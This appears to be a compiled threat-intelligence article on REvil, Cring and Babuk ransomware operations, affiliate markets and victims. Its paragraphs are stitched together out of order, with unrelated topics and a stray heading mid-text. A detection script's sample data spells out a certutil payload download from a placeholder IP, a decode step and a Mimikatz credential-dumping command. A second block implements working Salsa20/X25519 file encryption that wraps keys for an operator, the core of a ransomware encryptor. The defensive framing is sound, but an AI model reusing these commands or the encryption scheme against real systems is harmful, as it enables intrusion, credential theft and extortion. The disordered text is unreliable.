
The developers regularly update the REvil ransomware to avoid detection and improve the reliability of ongoing attacks. The group announces all major updates and availability of new partner program items in their various threads on cybercriminal forums. On April 18, 2021, the developer announced that the *nix implementation of the ransomware was undergoing closed testing.


After gaining initial access to the targeted network, the Cring operators drop customized Mimikatz samples and the Cobalt Strike threat-emulation framework. They then download the Cring ransomware payload onto the device using the legitimate Windows CertUtil certificate-management utility, a living-off-the-land technique that helps the download slip past security software, and deploy it.
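The two tradecraft signs in the paragraph above, certutil used as a downloader and Mimikatz run on a host, are both visible in process-creation telemetry. The detector below is an added example written for this page, not code from the source reports; the log record layout, the rule names and the sample command lines (including the file names rd.dat and crin.exe and the address 198.51.100.7) are constructed for the demo.

```python
"""Added example: flag certutil-as-downloader and Mimikatz command lines in
constructed process-creation records (host, parent image, command line)."""
import re

# Constructed sample telemetry for the demo; not real incident data.
SAMPLE_EVENTS = [
    ("ws01", r"C:\Windows\explorer.exe",
     r'"C:\Program Files\App\app.exe" --update'),
    ("srv-fs", r"C:\Windows\System32\cmd.exe",
     r"certutil.exe -urlcache -split -f http://198.51.100.7/rd.dat C:\Windows\Temp\rd.dat"),
    ("srv-fs", r"C:\Windows\System32\cmd.exe",
     r"certutil.exe -decode C:\Windows\Temp\rd.dat C:\Windows\Temp\crin.exe"),
    ("dc01", r"C:\Users\svc\AppData\Local\Temp\mk.exe",
     r"mk.exe privilege::debug sekurlsa::logonpasswords exit"),
    # Legitimate certificate chain check; must not be flagged.
    ("ws02", r"C:\Windows\System32\cmd.exe",
     r"certutil.exe -verify -urlfetch C:\certs\server.cer"),
]

RULES = [
    # certutil fetching a remote URL into the local cache is the classic
    # LOLBin download; -urlfetch alone (used by -verify) is not matched.
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*\bhttps?://", re.I)),
    # base64-decoding a dropped blob into an executable is the usual next step.
    ("certutil_decode",
     re.compile(r"certutil(\.exe)?\s.*-decode\b", re.I)),
    # Mimikatz module syntax survives binary renaming (mk.exe above).
    ("mimikatz_cmdline",
     re.compile(r"\b(sekurlsa|lsadump|privilege)::", re.I)),
]


def classify(cmdline: str) -> list:
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events) -> list:
    """Return one hit dict per event that matches at least one rule."""
    hits = []
    for host, parent, cmd in events:
        tags = classify(cmd)
        if tags:
            hits.append({"host": host, "parent": parent, "tags": tags, "cmd": cmd})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["host"], hit["tags"], hit["cmd"])
```

Matching on the module syntax rather than the file name is what catches the renamed Mimikatz binary; matching on `-urlcache` plus a URL rather than on `certutil` alone keeps routine certificate verification out of the alert queue.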



In addition to the text, the ransom note contains a list of links to screenshots of some of the exfiltrated data. This shows that the malware sample is built after the victim's data has already been exfiltrated. As mentioned above, each sample is customized for the specific target.


But by placing themselves under the spotlight, such groups hide the actual complexity of the ransomware ecosystem. From the outside, they may appear to be single entities; but they are in fact only the tip of the spear. In most attacks there are a significant number of actors involved, and a key takeaway is that they supply services to each other through dark web marketplaces.


REvil's victims include companies such as Travelex, Brown-Forman Corp, the pharmaceutical group Pierre Fabre, and the celebrity law firm Grubman Shire Meiselas & Sacks. In March 2021, the gang breached Acer and demanded the highest ransom recorded to date, $50 million.

Although Google has confirmed that exploits already exist in the wild, there has been no confirmation of those attacks or of which attackers hold the exploit code. This has led to some speculation that it could be related to the January warnings from Microsoft and Google about North Korean threat actors using a Chrome zero-day in an active campaign aimed at security researchers.


Additionally, operators screen potential partners to reduce the chances of hiring an undercover official, for instance, by checking their knowledge of the country they claim to be from, as illustrated in the example below. They may also impose restrictions on certain nationalities based on their political views. These are just some of the ways operators try to ensure their security.

REvil encrypts file contents with the Salsa20 symmetric stream cipher and protects the Salsa20 keys with an elliptic-curve asymmetric algorithm. The malware sample carries an encrypted configuration block with many fields that let the attackers fine-tune the payload. The executable can terminate blacklisted processes prior to encryption, exfiltrate basic host information, and encrypt non-whitelisted files and folders on local storage devices and network shares. A more detailed account of the technical capabilities of REvil is available in our private and public reports.
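The key hierarchy the paragraph describes is what makes recovery without the operators' private key infeasible: every file gets its own symmetric key, and that key is wrapped under an asymmetric public key so that nothing on the victim host can unwrap it. The block below is an added example written for this page, not REvil's code and not taken from the source reports. It implements Salsa20 from the specification and X25519 (Curve25519 Diffie-Hellman) from RFC 7748 in pure Python; the choice of Curve25519, the SHA-256 key-derivation step and the 72-byte footer layout are assumptions for illustration, since the page says only "an elliptic curve asymmetric algorithm".

```python
"""Added example: per-file Salsa20 key wrapped with X25519 for an operator
public key. Pure Python, stdlib only; not constant-time, demo quality."""
import hashlib
import os
import struct

MASK = 0xFFFFFFFF

def _rotl(v, c):
    return ((v << c) | (v >> (32 - c))) & MASK

def _quarterround(y0, y1, y2, y3):
    y1 ^= _rotl((y0 + y3) & MASK, 7)
    y2 ^= _rotl((y1 + y0) & MASK, 9)
    y3 ^= _rotl((y2 + y1) & MASK, 13)
    y0 ^= _rotl((y3 + y2) & MASK, 18)
    return y0, y1, y2, y3

# Word index groups for one column round followed by one row round.
_COLS = ((0, 4, 8, 12), (5, 9, 13, 1), (10, 14, 2, 6), (15, 3, 7, 11))
_ROWS = ((0, 1, 2, 3), (5, 6, 7, 4), (10, 11, 8, 9), (15, 12, 13, 14))

def salsa20_core(block: bytes) -> bytes:
    """Salsa20/20 hash: 64-byte state in, 64-byte keystream block out."""
    x = list(struct.unpack("<16I", block))
    z = x[:]
    for _ in range(10):                      # 10 double rounds = 20 rounds
        for a, b, c, d in _COLS + _ROWS:
            z[a], z[b], z[c], z[d] = _quarterround(z[a], z[b], z[c], z[d])
    return struct.pack("<16I", *[(z[i] + x[i]) & MASK for i in range(16)])

def salsa20_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Salsa20 stream XOR: 256-bit key, 64-bit nonce; same call decrypts."""
    assert len(key) == 32 and len(nonce) == 8
    sigma = b"expand 32-byte k"
    out = bytearray()
    for off in range(0, len(data), 64):
        state = (sigma[0:4] + key[:16] + sigma[4:8] + nonce
                 + struct.pack("<Q", off // 64) + sigma[8:12] + key[16:] + sigma[12:16])
        ks = salsa20_core(state)
        out += bytes(p ^ k for p, k in zip(data[off:off + 64], ks))
    return bytes(out)

P = 2**255 - 19
BASEPOINT = (9).to_bytes(32, "little")

def x25519(scalar: bytes, point: bytes) -> bytes:
    """RFC 7748 Montgomery ladder on Curve25519 (clamped scalar, masked u)."""
    k = int.from_bytes(scalar, "little") & ((1 << 255) - 1) & ~7 | (1 << 254)
    u = int.from_bytes(point, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, u, 1, 0
    for t in range(254, -1, -1):
        bit = (k >> t) & 1
        swap ^= bit
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = bit
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3, z3 = (da + cb) ** 2 % P, u * ((da - cb) ** 2) % P
        x2, z2 = aa * bb % P, e * (aa + 121665 * e) % P
    if swap:
        x2, z2 = x3, z3
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")

def x25519_keypair():
    priv = os.urandom(32)
    return priv, x25519(priv, BASEPOINT)

FOOTER = 32 + 32 + 8  # ephemeral public key + wrapped file key + nonce (assumed layout)

def encrypt_file(plaintext: bytes, operator_pub: bytes) -> bytes:
    """Victim side: needs only the operators' public key."""
    file_key, nonce = os.urandom(32), os.urandom(8)
    body = salsa20_xor(file_key, nonce, plaintext)
    eph_priv, eph_pub = x25519_keypair()
    wrap_key = hashlib.sha256(x25519(eph_priv, operator_pub)).digest()  # KDF: assumption
    wrapped = salsa20_xor(wrap_key, nonce, file_key)
    return body + eph_pub + wrapped + nonce

def decrypt_file(blob: bytes, operator_priv: bytes) -> bytes:
    """Operator side: needs the private key that never touched the victim host."""
    body, footer = blob[:-FOOTER], blob[-FOOTER:]
    eph_pub, wrapped, nonce = footer[:32], footer[32:64], footer[64:]
    wrap_key = hashlib.sha256(x25519(operator_priv, eph_pub)).digest()
    file_key = salsa20_xor(wrap_key, nonce, wrapped)
    return salsa20_xor(file_key, nonce, body)

def demo() -> bool:
    """Round trip with a constructed document; True when the scheme is consistent."""
    operator_priv, operator_pub = x25519_keypair()
    plaintext = b"constructed sample document contents\n" * 5
    blob = encrypt_file(plaintext, operator_pub)
    return blob[:-FOOTER] != plaintext and decrypt_file(blob, operator_priv) == plaintext

if __name__ == "__main__":
    print("round trip ok:", demo())
```

The defensive takeaway is in `decrypt_file`: the only secret that can unwrap a file key is `operator_priv`, which is never present on the victim. Memory forensics after the fact can at best recover per-file keys that were still resident, which is why response has to focus on backups and on stopping the encryptor early rather than on breaking the scheme.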


Privilege elevation, reconnaissance and lateral movement follow a successful breach. The operators then evaluate, exfiltrate and encrypt sensitive files. The next stage is negotiations with the attacked company.

But this is also an area where there is more than meets the eye, because of the diversity of the ransomware ecosystem. There is, of course, a documented porosity between the ransomware ecosystem and other cybercrime domains such as carding or point-of-sale (PoS) hacking. But it is worth pointing out that not all members of this ecosystem originate from the cybercrime underworld. In the past, high-profile ransomware attacks have been used as a destructive means. It is not unreasonable to think that some APT actors are still resorting to similar tactics to destabilize rival economies while maintaining strong plausible deniability.


The group behind the Babuk locker primarily targets large industrial organizations in Europe, the US and Oceania. Targeted industries include, but are not limited to, transportation services, the healthcare sector, and various suppliers of industrial equipment. In fact, recent cases show that Babuk operators are expanding their targets.

Ransomware world in 2021: who, how and why

In one incident, the ransomware caused a temporary shutdown of an organization’s industrial process after the server was encrypted. There is no news about how this issue was resolved.


The ransomware market is a closed one, and the operators behind it are careful about who they choose to work with. This caution is reflected in the ads the operators place and criteria they impose when selecting partners.

Cring ransomware encrypts specific files on the infected devices. It uses strong encryption algorithms and also deletes backup files.


Unpatched vulnerable VPN servers hit by Cring ransomware

On April 18, 2021, a member of the REvil group announced, in a post on the forums where cybercriminals recruit new affiliates, that the gang was about to reveal its "most high-profile attack ever". On April 20, the group published a number of alleged blueprints for Apple devices on its Happy Blog site. According to the attackers, the data was stolen from Quanta's network. Quanta Computer is a Taiwan-based manufacturer and one of Apple's partners. REvil's initial ransom demand to Quanta was $50 million.


To distribute the ransomware, REvil cooperates with affiliates hired on cybercriminal forums. The ransom demand is based on the annual revenue of the victim, and affiliates earn between 60% and 75% of the ransom. Monero (XMR) cryptocurrency is used for payment. According to the interview with the REvil operator, the gang earned over $100 million from its operations in 2020.



While many ransomware operators look for partners, some sell ransomware source code or do-it-yourself (DIY) ransomware packages. Such offers vary from US$300 to US$5000.

When it comes to the sale of digital goods or services related to cybercrime on the darknet, most information is aggregated on just a few large platforms, though there are multiple smaller thematic ones focusing on a single topic or product. We analyzed three main forums on which ransomware-related offers are aggregated. These forums are the main platforms where cybercriminals who work with ransomware actively communicate and trade. While the forums host hundreds of advertisements and offers, for analysis we selected just a few dozen offers that had been verified by the forum administrations and placed by groups with an established reputation. These ads included a variety of offers, from the sale of source code to regularly updated recruitment advertisements, available in English and Russian.


According to the post on this site, the gang was able to exfiltrate more than 250 GB of data from Washington’s Metropolitan Police Department network. At the time of writing, the police department had three days to start the negotiation process with the attackers; otherwise, the group would start leaking data to criminal gangs. Babuk also warned that it would continue to attack the US state sector.


When the red team is ready to launch the attack, it will purchase a ransomware product from dark web developers, usually in exchange for a cut of the ransom. An optional role here is the packer developer, who may add protection layers to the ransomware program and make it harder for security products to detect for the few hours it needs to encrypt the whole network.


Over the past couple of years, so-called JS-skimming (stealing payment card data from online stores with injected JavaScript) has gained immense popularity among attackers. Currently, Kaspersky researchers are aware of at least 10 different actors involved in this type of attack, and experts believe that their number will continue to grow over the next year. The most dangerous attacks will be on companies that provide e-commerce-as-a-service and similar platforms, since a single compromise there cascades to thousands of customer companies.

The unpatched VPN vulnerability is also the ransomware operators' way into the targeted network. Having compromised the Fortinet VPN device, the Cring operators move laterally across the enterprise network and use Mimikatz to steal Windows user credentials until they gain control of a domain administrator account.


At the end of April 2021, the threat actors behind Babuk announced the end of their activity, stating that they will make their source code publicly available in order to “do something like Open Source RaaS”. This means that we’ll probably see a new wave of ransomware activity as soon as various smaller threat actors adopt the leaked source code for their operations. We’ve seen this sort of situation happen before with other RaaS and MaaS projects – the Cerberus banking Trojan for Android is a good example from last year.


According to our research, this malware affected almost 20 business sectors. The largest share of victims fell into the category Engineering & Manufacturing (30%), followed by Finance (14%), Professional & Consumer Services (9%), Legal (7%), and IT & Telecommunications (7%).

In 2021, Kaspersky experts expect an increase in the activity of groups specialised in the criminal-to-criminal sale of network access to banks in the African and Asian regions, as well as in Eastern Europe. Their prime targets are small banks, as well as financial organisations recently bought by big players that are rebuilding their cybersecurity systems in accordance with the standards of their parent companies. The same banks are also expected to become victims of targeted ransomware attacks, as banks are among the organisations more likely to pay a ransom than accept the loss of data.